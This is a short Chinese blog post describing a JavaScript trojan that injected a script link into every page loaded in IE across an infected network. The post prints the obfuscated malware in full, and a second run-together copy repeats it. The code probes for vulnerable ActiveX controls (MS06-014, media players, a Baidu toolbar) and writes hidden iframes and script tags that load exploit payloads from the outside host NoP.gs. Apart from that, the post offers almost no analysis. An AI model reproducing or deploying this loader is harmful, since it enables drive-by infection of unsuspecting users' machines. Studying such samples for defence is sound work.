本文分析了一个导致所有IE浏览器加载恶意脚本的JavaScript病毒/木马代码。该病毒通过设置Cookie并利用ActiveXObject创建不同组件,强制加载远程恶意JS文件,影响用户的网络浏览体验。清除此病毒较为复杂。
中毒的话,整个网络都会受影响,表现为所有的IE浏览器打开的网页都会在前面加一个 javascript 的连接。清除比较麻烦。显示的这段是这个链接后面的代码:
var vDA1 = new window["Date"]()
vDA1["setTime"](vDA1["getTime"]() + 24*60*60*1000)
var eOTo$2 = new window["String"](window["document"]["cookie"])
var eZT3 = "Cookie1="
var VMliYvVKu4 = eOTo$2["indexOf"](eZT3)
if (VMliYvVKu4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ vDA1["toGMTString"]()
try{if(new ActiveXObject("Microsoft.XMLHTTP"))window["document"]["write"]('<script src="http://NoP.gs/s368/NewJs1.js"></script>');}catch(e){} // ms06014
try{if(new ActiveXObject("DPClient.Vod"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/t368ok.gif"></iframe>');}catch(e){} // XL
try{if(new ActiveXObject("MPS.StormPlayer.1"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/Go368.gif"></iframe>');}catch(e){} // BF
try{if(new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/T368.gif"></iframe>');}catch(e){} // PPS
try{if(new ActiveXObject("Pdg2"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/reader368.gif"></iframe>');}catch(e){} // CX
try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/Link368.gif"></iframe>');}catch(e){} // LZ
try{if(new ActiveXObject("BaiduBar.Tool.1"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/Pic368.gif"></iframe>');}catch(e){} // Baidu
}
可见,这是针对地影响的。
var vDA1 = new window["Date"]() vDA1["setTime"](vDA1["getTime"]() + 24*60*60*1000)var eOTo$2 = new window["String"](window["document"]["cookie"])var eZT3 = "Cookie1=" var VMliYvVKu4 = eOTo$2["indexOf"](eZT3)if (VMliYvVKu4 == -1){
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ vDA1["toGMTString"]()try{if(new ActiveXObject("Microsoft.XMLHTTP"))window["document"]["write"]('<script src="http://NoP.gs/s368/NewJs1.js"></script>');}catch(e){} // ms06014
try{if(new ActiveXObject("DPClient.Vod"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/t368ok.gif"></iframe>');}catch(e){} // XLtry{if(new ActiveXObject("MPS.StormPlayer.1"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/Go368.gif"></iframe>');}catch(e){} // BFtry{if(new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/T368.gif"></iframe>');}catch(e){} // PPStry{if(new ActiveXObject("Pdg2"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/reader368.gif"></iframe>');}catch(e){} // CXtry{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/Link368.gif"></iframe>');}catch(e){} // LZtry{if(new ActiveXObject("BaiduBar.Tool.1"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/Pic368.gif"></iframe>');}catch(e){} // Baidu}可见,这是针对地影响的。
扫一扫
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
